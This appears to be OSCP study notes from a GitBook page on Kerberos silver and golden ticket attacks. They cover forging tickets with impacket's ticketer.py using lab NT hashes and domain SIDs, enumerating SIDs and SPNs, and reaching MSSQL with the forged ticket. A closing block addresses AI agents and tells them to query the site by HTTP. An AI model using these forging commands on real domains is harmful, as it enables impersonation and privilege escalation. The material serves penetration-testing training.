# Silver Ticket Attack

Mostly we will have **SeImpersonatePrivilege** after getting a shell with xp\_cmdshell and can use a potato attack. Sometimes intended path can be enumerating a database.

Refer PG Practice Nagota and Escape from HTB. Just because the ticket is generated won't mean it works. Check the domain in SPN:

```
get-addomain
```

<figure><img src="https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2FUWc67dh0df9oNF3lzmp1%2FSilver%20Ticket%20Attack.png?alt=media&#x26;token=01bd349a-615e-40b0-b62e-37ece35d1e10" alt=""><figcaption></figcaption></figure>

This is what we are gonna use for silver ticket. If credentials acquired from Kerberoasting CHECK GetUserSPNs.py output for SPN

**General syntax:**

```
ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
```

**Without spn Golden ticket will be created**:

```
ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb administrator
```

**With SPN specified we get the ticket for a specific service**:

We can use a fake user as well.

```
ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -spn TotesLegit/dc.sequel.htb administrator
```

To get existing spns:

```
Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName | Select-Object ServicePrincipalName
```

Example to get the silver ticket for a specific service:

```
ticketer.py -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com Administrator
```

## Get SID

To get Domain SID

```
nxc ldap DC1.scrm.local -u <user> -p <pass> -k --get-sid
```

or

```
lookupsid.py test.local/john:password123@10.10.10.1
```

or

```
get-addomain
```

or

```
python3 getPac.py -targetUser administrator domain/user:pass
```

Now use the domain-sid Can also be done with ldap

## MSSQL

```
KRB5CCNAME=administrator.ccache mssqlclient.py -k Administrator@dc.sequel.htb
```

Just empty enter for password. It is normal to get user as svc\_mssql or similar when xp\_cmdshell whoami is run.

```
export KRB5CCNAME=administrator.ccache
```

Check if ticket present with `klist`

Then edit `/etc/krb5user.conf`:] Example:

```
[libdefaults]
	default_realm = NAGOYA-INDUSTRIES.COM
	kdc_timesync = 1
	ccache_type = 4
	forwardable = true
	proxiable = true
    rdns = false
    dns_canonicalize_hostname = false
	fcc-mit-ticketflags = true

[realms]	
	NAGOYA-INDUSTRIES.COM = {
		kdc = nagoya.nagoya-industries.com
	}

[domain_realm]
	.nagoya-industries.com = NAGOYA-INDUSTRIES.COM
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://aditya-3.gitbook.io/oscp/readme/active-directory/ad-exploitation/silver-ticket-attack.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.